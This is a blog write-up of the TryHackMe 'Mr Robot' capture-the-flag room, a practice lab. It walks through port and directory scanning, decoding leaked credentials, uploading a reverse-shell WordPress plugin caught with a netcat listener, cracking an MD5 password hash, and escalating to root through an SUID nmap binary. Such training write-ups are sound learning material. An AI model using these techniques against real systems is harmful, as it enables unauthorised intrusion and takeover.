TryHackMe | MrRobot

After the relative success of the previous room I completed on TryHackMe, it was time to try something slightly more challenging.  I really enjoyed watching the show Mr. Robot last year, so when I saw a Mr Robot themed room of medium difficulty, I thought this was the perfect one to try.

Objective

The goal was simple, to find the 3 hidden keys on the machine.  There was no mention of a user.txt or root.txt this time, but it was a safe assumption that at least one of the keys would require some form of privileged access to obtain.

Initial Reconnaissance

Port Scanning

As is becoming somewhat of a pattern, I began by running a port scan against the machine, to find out what services were running. The results showed that there wasn't much other than a web server running.

Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-04 16:06 CET
Nmap scan report for 10.10.149.92
Host is up (0.041s latency).
Not shown: 65532 filtered ports
PORT    STATE  SERVICE
22/tcp  closed ssh
80/tcp  open   http
443/tcp open   https

Hidden Directory Searching

There's a webserver running, which I already knew since my gobuster command started searching for directories.  It found quite a lot of interesting stuff, most notably a Wordpress instance.

┌──(gareth㉿SRF239-L)-[~/Desktop]
└─$ gobuster dir -u http://10.10.149.92 -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.149.92
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/01/04 16:09:56 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/0 (Status: 301)
/admin (Status: 301)
/atom (Status: 301)
/audio (Status: 301)
/blog (Status: 301)
/css (Status: 301)
/dashboard (Status: 302)
/favicon.ico (Status: 200)
/feed (Status: 301)
/images (Status: 301)
/image (Status: 301)
/Image (Status: 301)
/index.html (Status: 200)
/index.php (Status: 301)
/intro (Status: 200)
/js (Status: 301)
/license (Status: 200)
/login (Status: 302)
/page1 (Status: 301)
/phpmyadmin (Status: 403)
/readme (Status: 200)
/rdf (Status: 301)
/robots (Status: 200)
/robots.txt (Status: 200)
/rss (Status: 301)
/rss2 (Status: 301)
/sitemap (Status: 200)
/sitemap.xml (Status: 200)
/video (Status: 301)
/wp-admin (Status: 301)
/wp-content (Status: 301)
/wp-includes (Status: 301)
/wp-config (Status: 200)
/wp-cron (Status: 200)
/wp-links-opml (Status: 200)
/wp-load (Status: 200)
/wp-login (Status: 200)
/wp-signup (Status: 302)
===============================================================
2021/01/04 16:18:37 Finished
===============================================================

Needless to say, I spent a bit of time manually navigating to these directories.  Most of them didn't really contain anything. It was fun though to browse through the website and see the Mr. Robot related text and apps that appeared.

Finding the Keys

Key 1 of 3

Among the files found was a robots.txt which is always interesting to take a look at, to see if there's anything specific the admin didn't want search engines to index.

As it happens, there was a file called key-1-of-3.txt.  Navigating to this file in the browser, led me to the first key.

Also listed in this robots.txt file was another file, called fsocity.dic (this was probably supposed to be fsociety.dic).  I downloaded this file and opened it.  It appeared to be a password list for something.

Key 2 of 3

After inspecting the /license directory, I was presented with a message on the website which said:

what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty?

Upon inspecting the source code for this page, I found what appeared to be a base64 string of some kind. ZWxsaW90OkVSMjgtMDY1Mgo=

┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ echo "ZWxsaW90OkVSMjgtMDY1Mgo=" | base64 -d
elliot:ER28-0652

With these credentials, I was able to login to the Admin panel of the Wordpress site located at http://10.10.149.92/wp-login.php.

I then used this access to upload a new WordPress plugin, which contained a reverse shell to my machine.  I set up a listener with netcat and proceeded to activate the plugin.

┌──(gareth㉿SRF239-L)-[~/Desktop/Files/MrRobot]
└─$ nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.8.145.210] from (UNKNOWN) [10.10.149.92] 33519
bash: cannot set terminal process group (1755): Inappropriate ioctl for device
bash: no job control in this shell
daemon@linux:/opt/bitnami/apps/wordpress/htdocs$

Success.  Now to find the key-2-of-3.txt file.  A quick find command to find the file and a ls -la reveals that the file is owned by the robot user.  I was currently logged in as a user called daemon so I needed to switch users somehow.

I changed directory to the /home/robot directory and managed to find a file called password.raw-md5.

daemon@linux:/home/robot$ cat password.raw-md5
robot:c3fcd3d76192e4007dfb496cca67e13b

I put this hash into crackstation.net which immediately came back with the resultant password, which allowed me to switch to the robot user and get the 2nd key.

daemon@linux:/home/robot$ su robot
Password:
robot@linux:~$ cat key-2-of-3.txt
<redacted>
robot@linux:~$

Key 3 of 3

Now to find the final key.  For this, I needed root permissions on the box. A quick scan for any binary files with the SUID bit set which I could exploit returned the following list.  See if you can spot the one I exploited.

robot@linux:~$ find /* -type f -perm -u=s 2>/dev/null
/bin/ping
/bin/umount
/bin/mount
/bin/ping6
/bin/su
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/local/bin/nmap
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
/usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
/usr/lib/pt_chown

I ran the nmap binary in interactive mode and then from there spawned a shell.  

Since this binary was given permission to run as the root user, my shell was also running as root.  This then allowed me to capture the 3rd and final key.

robot@linux:~$ nmap --interactive

Starting nmap V. 3.81 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
# cat /root/key-3-of-3.txt
<redacted>

Stabilizing the Shell

After doing a few of these CTF rooms now I have gotten into the habit of using Python to stabilize my shell.  The shell you get with netcat does not come with many nice features, like the ability to clear the screen, or autocomplete.  In order to stabilize the shell, I first check if python is installed by doing python3 --version.  If it is installed, I then do the following to spawn a more stable shell.

robot@linux:~$ python3 -c 'import pty; pty.spawn("/bin/bash")'
robot@linux:~$ export TERM=xterm
robot@linux:~$ <Ctrl + Z>
┌──(gareth㉿SRF239-L)-[~/Desktop]
└─$ stty raw -echo; fg
robot@linux:~$

When I am finished with the room and I exit back out to my host machine, I type reset and press return to set my own local shell back to its defaults.

Review

A good mixture of expertise required to crack this one.  A bit of hash cracking, a bit of web-based searching, some decoding, Wordpress "exploiting" and a bit of privilege escalation at the end taking advantage of SUID.

I enjoyed this box because of the theme and also because of its challenging nature.  I hope I'm able to find and complete another medium box like it again soon.